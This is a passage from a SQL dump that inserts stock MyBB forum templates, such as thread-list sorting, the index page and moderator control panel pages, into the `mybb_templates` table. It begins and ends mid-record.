class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a> {$orderarrow[\'views\']}</strong></span></td> {$ratingcol} <td class=\"tcat\" align=\"right\" width=\"20%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=lastpost&amp;order=desc\">{$lang->lastpost}</a> {$orderarrow[\'lastpost\']}</strong></span></td> {$inlinemodcol} </tr> {$selectall} {$announcementlist} {$threads} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"{$colspan}\"> <form action=\"forumdisplay.php\" method=\"get\"> <input type=\"hidden\" name=\"selectall\" value=\"{$allselected}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" /> <select name=\"sortby\"> <option value=\"subject\" {$sortsel[\'subject\']}>{$lang->sort_by_subject}</option> <option value=\"lastpost\" {$sortsel[\'lastpost\']}>{$lang->sort_by_lastpost}</option> <option value=\"starter\" {$sortsel[\'starter\']}>{$lang->sort_by_starter}</option> <option value=\"started\" {$sortsel[\'started\']}>{$lang->sort_by_started}</option> {$ratingsort} <option value=\"replies\" {$sortsel[\'replies\']}>{$lang->sort_by_replies}</option> <option value=\"views\" {$sortsel[\'views\']}>{$lang->sort_by_views}</option> </select> <select name=\"order\"> <option value=\"asc\" {$ordersel[\'asc\']}>{$lang->sort_order_asc}</option> <option value=\"desc\" {$ordersel[\'desc\']}>{$lang->sort_order_desc}</option> </select> <select name=\"datecut\"> <option value=\"1\" {$datecutsel[\'1\']}>{$lang->datelimit_1day}</option> <option value=\"5\" {$datecutsel[\'5\']}>{$lang->datelimit_5days}</option> <option value=\"10\" {$datecutsel[\'10\']}>{$lang->datelimit_10days}</option> <option value=\"20\" {$datecutsel[\'20\']}>{$lang->datelimit_20days}</option> <option value=\"50\" {$datecutsel[\'50\']}>{$lang->datelimit_50days}</option> <option value=\"75\" {$datecutsel[\'75\']}>{$lang->datelimit_75days}</option> <option value=\"100\" {$datecutsel[\'100\']}>{$lang->datelimit_100days}</option> <option value=\"365\" {$datecutsel[\'365\']}>{$lang->datelimit_lastyear}</option> <option value=\"9999\" {$datecutsel[\'9999\']}>{$lang->datelimit_beginning}</option> </select> {$gobutton} </form> </td> </tr> </table> <div class=\"float_left\"> {$multipage} </div> <div class=\"float_right\" style=\"margin-top: 4px;\"> {$newthread} </div> <br style=\"clear: both;\" /> <br /> <div class=\"float_left\"> <div class=\"float_left\"> <dl class=\"thread_legend smalltext\"> <dd><img src=\"{$theme[\'imgdir\']}/newfolder.gif\" alt=\"{$lang->new_thread}\" title=\"{$lang->new_thread}\" /> {$lang->new_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/newhotfolder.gif\" alt=\"{$lang->new_hot_thread}\" title=\"{$lang->new_hot_thread}\" /> {$lang->new_hot_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/hotfolder.gif\" alt=\"{$lang->hot_thread}\" title=\"{$lang->hot_thread}\" /> {$lang->hot_thread}</dd> </dl> </div> <div class=\"float_left\"> <dl class=\"thread_legend smalltext\"> <dd><img src=\"{$theme[\'imgdir\']}/folder.gif\" alt=\"{$lang->no_new_thread}\" title=\"{$lang->no_new_thread}\" /> {$lang->no_new_thread}</dd> <dd><img src=\"{$theme[\'imgdir\']}/dot_folder.gif\" alt=\"{$lang->posts_by_you}\" title=\"{$lang->posts_by_you}\" /> {$lang->posts_by_you}</dd> <dd><img src=\"{$theme[\'imgdir\']}/lockfolder.gif\" alt=\"{$lang->locked_thread}\" title=\"{$lang->locked_thread}\" /> {$lang->locked_thread}</dd> </dl> </div> <br style=\"clear: both\" /> </div> <div class=\"float_right\" style=\"text-align: right;\"> {$inlinemod} {$searchforum} {$forumjump} </div> <br style=\"clear: both\" /> {$inline_edit_js}', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2', 'forumdisplay_threadlist_sortrating', '<option value=\"rating\" {$sortsel[\'rating\']}>{$lang->sort_by_rating}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('3', 'global_boardclosed_warning', '<div class=\"red_alert\"><strong><span style=\"color:#FF0000;\">{$lang->bbclosed_warning}</span></strong></div>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('4', 'global_pm_alert', '<div class=\"pm_alert\" id=\"pm_notice\"> <div class=\"float_right\"><a href=\"private.php?action=dismiss_notice&amp;my_post_key={$mybb->post_code}\" title=\"{$lang->dismiss_notice}\" onclick=\"return MyBB.dismissPMNotice()\"><img src=\"{$theme[\'imgdir\']}/dismiss_notice.gif\" alt=\"{$lang->dismiss_notice}\" title=\"[x]\" /></a></div> <div>{$privatemessage_text}</div> </div> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('5', 'post_savedraftbutton', '&nbsp;<input type=\"submit\" class=\"button\" name=\"savedraft\" value=\"{$lang->save_draft}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('6', 'index', '<html> <head> <title>{$mybb->settings[\'bbname\']}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- lang.no_new_posts = \"{$lang->no_new_posts}\"; lang.click_mark_read = \"{$lang->click_mark_read}\"; // --> </script> </head> <body> {$header} {$forums} {$boardstats} <dl class=\"forum_legend smalltext\"> <dt><img src=\"{$theme[\'imgdir\']}/on.gif\" alt=\"{$lang->new_posts}\" title=\"{$lang->new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt> <dd>{$lang->new_posts}</dd> <dt><img src=\"{$theme[\'imgdir\']}/off.gif\" alt=\"{$lang->no_new_posts}\" title=\"{$lang->no_new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt> <dd>{$lang->no_new_posts}</dd> <dt><img src=\"{$theme[\'imgdir\']}/offlock.gif\" alt=\"{$lang->forum_locked}\" title=\"{$lang->forum_locked}\" style=\"vertical-align: middle;\" /></dt> <dd>{$lang->forum_locked}</dd> </dl> <br style=\"clear: both\" /> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('7', 'modcp_reports_allreports', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->all_reported_posts}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->all_reported_posts_note}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td> </tr> {$allreports} {$allreportspages} </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('8', 'modcp_modlogs', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->modlogs}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php?action=modlogs\" method=\"post\"> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->modlogs}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->action}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->information}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ip}</strong></span></td> </tr> {$results} {$resultspages} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->filter_modlogs}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->forum}</strong></td> <td class=\"trow1\" width=\"75%\"> {$forum_select} </td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->from_moderator}</strong></td> <td class=\"trow1\" width=\"75%\"> <select name=\"uid\"> <option value=\"\">{$lang->all_moderators}</option> <option value=\"\">----------</option> {$user_options} </select> </td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->sort_by}</strong></td> <td class=\"trow1\" width=\"75%\"> <select name=\"sortby\"> <option value=\"dateline\"{$sortbysel[\'dateline\']}>{$lang->date}</option> <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option> <option value=\"forum\"{$sortbysel[\'forum\']}>{$lang->forum_name}</option> <option value=\"thread\"{$sortbysel[\'thread\']}>{$lang->thread_subject}</option> </select> {$lang->in} <select name=\"order\"> <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option> <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option> </select> {$lang->order} </td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->per_page}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"perpage\" value=\"{$perpage}\" size=\"4\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" value=\"{$lang->filter_logs}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('9', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td> </tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr> </tbody> <tr> <td class=\"tcat\"> <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr> </tbody> </table> </td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('10', 'modcp', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->modcp}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"3\"><strong>{$lang->awaiting_moderation}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"23%\"><span class=\"smalltext\"><strong>{$lang->type}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"33%\"><span class=\"smalltext\"><strong>{$lang->number_awaiting}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"44%\"><span class=\"smalltext\"><strong>{$lang->latest}</strong></span></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\"><strong>{$lang->threads}</strong></span></td> <td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$unapproved_threads}</span></td> <td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$latest_thread}</span></td> </tr> <tr> <td class=\"trow2\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td> <td class=\"trow2\" align=\"center\"><span class=\"smalltext\">{$unapproved_posts}</span></td> <td class=\"trow2\" align=\"center\"><span class=\"smalltext\">{$latest_post}</span></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\"><strong>{$lang->attachments}</strong></span></td> <td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$unapproved_attachments}</span></td> <td class=\"trow1\" align=\"center\"><span class=\"smalltext\">{$latest_attachment}</span></td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->latest_5_modactions}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->action}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->information}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ip}</strong></span></td> </tr> {$modlogresults} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"4\"><strong>{$lang->bans_ending_soon}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->ban_length}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->ban_bannedby}</strong></span></td> </tr> {$bannedusers} </table> <br /> <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_modnotes\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"1\"><strong>{$lang->moderator_notes}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->notes_public_all}</strong></span> </td> <tr> <td class=\"trow1\"><textarea name=\"modnotes\" style=\"width: 99%; height: 200px;\" rows=\"5\" cols=\"45\">{$modnotes}</textarea></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"notessubmit\" value=\"{$lang->save_notes}\" /></div> </form> </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('11', 'modcp_reports', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reported_posts}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"page\" value=\"{$page}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"7\"><strong>{$lang->reported_posts_note}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->post_id}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->poster}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reporter}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->report_reason}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->report_time}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"5%\"><input type=\"checkbox\" name=\"allbox\" onclick=\"selectReportedPosts();\" /></td> </tr> {$reports} {$reportspages} <tr> <td class=\"tfoot\" colspan=\"7\" align=\"right\"><span class=\"smalltext\"><strong><a href=\"modcp.php?action=allreports\">{$lang->view_all_reported_posts}</a></strong></span></td> </tr> </table> <br /> <div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"do_reports\" /><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->mark_read}\" /></div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\"> <!-- var checked = false; function selectReportedPosts() { if(checked == false) { checked = true; $$(\'input[type=\"checkbox\"]\').invoke(\'writeAttribute\', \'checked\', \'checked\'); } else { checked = false; $$(\'input[type=\"checkbox\"]\').invoke(\'writeAttribute\', \'checked\', \'\'); } } // --> </script> </body> </html>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('12', 'modcp_modlogs_result', '<tr> <td class=\"{$trow}\" valign=\"top\">{$logitem[\'profilelink\']}</td> <td class=\"{$trow}\" align=\"center\" valign=\"top\">{$log_date}, {$log_time}</td> <td class=\"{$trow}\" align=\"center\" valign=\"top\">{$logitem[\'action\']}</td> <td class=\"{$trow}\" align=\"center\" valign=\"top\">{$information}</td> <td class=\"{$trow}\" align=\"center\" valign=\"top\">{$logitem[\'ipaddress\']}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('13', 'modcp_modlogs_noresults', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->error_no_results}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('14', 'modcp_modlogs_multipage', '<tr> <td class=\"tcat\" colspan=\"6\"><span class=\"smalltext\"> {$multipage}</span></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('15', 'modcp_ipsearch', ' <html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->ipsearch}</title> {$headerinclude} </head> <body> {$header} <form action=\"modcp.php?action=ipsearch\" method=\"post\"> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$ipsearch_results} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->ipaddress_search}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"25%\"><strong>{$lang->ip_address}</strong></td> <td class=\"trow1\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"ipaddress\" value=\"{$ipaddressvalue}\" size=\"30\" /></td> </tr> <tr> <td class=\"trow1\" width=\"25%\" valign=\"top\"><strong>{$lang->options}</strong></td> <td class=\"trow1\" width=\"75%\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"search_users\" value=\"1\" {$usersearchselect} />{$lang->search_users}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"search_posts\" value=\"1\" {$postsearchselect} />{$lang->search_posts}</label> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" value=\"{$lang->find}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('16', 'modcp_ipsearch_results', ' <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"2\"> {$misc_info_link}<div><strong>{$lang->ipsearch_results}</strong></div> </td> </tr> <tr> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->ipaddress}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->result}</strong></span></td> </tr> {$results} </table> {$multipage} <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('17', 'modcp_ipsearch_misc_info', '<html> <head> <title>{$lang->ipaddress_misc_info}</title> {$headerinclude} <style type=\"text/css\"> body { text-align: left; } </style> </head> <body style=\"margin:0; padding: 4px; top: 0; left: 0;\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"2\"> <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"window.close();\">Close</a></span></div> <div><strong>{$lang->ipaddress_misc_info}</strong></div> </td> </tr> <tr> <td class=\"trow1\" width=\"25%\" align=\"center\">{$lang->ipaddress_host_name}</td> <td class=\"trow1\">{$ipaddress_host_name}</td> </tr> <tr> <td class=\"trow2\" width=\"25%\" align=\"center\">{$lang->ipaddress_location}</td> <td class=\"trow2\">{$ipaddress_location}</td> </tr> </table> </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('18', 'modcp_ipsearch_result', '<tr> <td class=\"{$trow}\" align=\"center\">{$ip}</td> <td class=\"{$trow}\">{$subject}</td> </tr> ', '-2', '1408', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('19', 'modcp_ipsearch_noresults', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"2\">{$lang->error_no_results}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('20', 'header_welcomeblock_member', ' <span style=\"float:right;\">{$lang->welcome_current_time}</span> {$lang->welcome_back} (<a href=\"{$mybb->settings[\'bburl\']}/usercp.php\"><strong>{$lang->welcome_usercp}</strong></a>{$modcplink}{$admincplink} &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->welcome_logout}</a>)<br /> <span class=\"links\"> <a href=\"#\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/misc.php?action=buddypopup\', \'buddyList\', 350, 350);\">{$lang->welcome_open_buddy_list}</a> </span> <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\">{$lang->welcome_newposts}</a> | <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\">{$lang->welcome_todaysposts}</a> | <a href=\"{$mybb->settings[\'bburl\']}/private.php\">{$lang->welcome_pms}</a> {$lang->welcome_pms_usage}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('21', 'header_welcomeblock_member_moderator', ' &mdash; <a href=\"{$mybb->settings[\'bburl\']}/modcp.php\">{$lang->welcome_modcp}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('22', 'postbit_online', '<a href=\"online.php\" title=\"{$lang->postbit_status_online}\"><img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" border=\"0\" alt=\"{$lang->postbit_status_online}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('23', 'showthread_moderationoptions', '{$inlinemod} <form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\" id=\"moderator_options\"> <input type=\"hidden\" name=\"modtype\" value=\"thread\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <span class=\"smalltext\"> <strong>{$lang->moderation_options}</strong></span> <select name=\"action\" onchange=\"$(\'moderator_options\').submit();\"> <option value=\"delayedmoderation\">{$lang->delayed_moderation}</option> <optgroup label=\"{$lang->standard_mod_tools}\"> <option value=\"threadnotes\" selected=\"selected\">{$lang->thread_notes}</option> <option value=\"openclosethread\">{$lang->open_close_thread}</option> <option value=\"deletethread\">{$lang->delete_thread}</option> {$adminpolloptions} <option value=\"deleteposts\">{$lang->delete_posts}</option> <option value=\"move\">{$lang->move_thread}</option> <option value=\"stick\">{$lang->stick_unstick_thread}</option> <option value=\"split\">{$lang->split_thread}</option> <option value=\"merge\">{$lang->merge_threads}</option> <option value=\"mergeposts\">{$lang->merge_posts}</option> <option value=\"removeredirects\">{$lang->remove_redirects}</option> <option value=\"removesubscriptions\">{$lang->remove_subscriptions}</option> {$approveunapprovethread} </optgroup> {$customthreadtools} </select> {$gobutton} </form> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('24', 'showthread_moderationoptions_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('25', 'showthread_moderationoptions_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('26', 'showthread_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customposttools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('27', 'showthread_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('28', 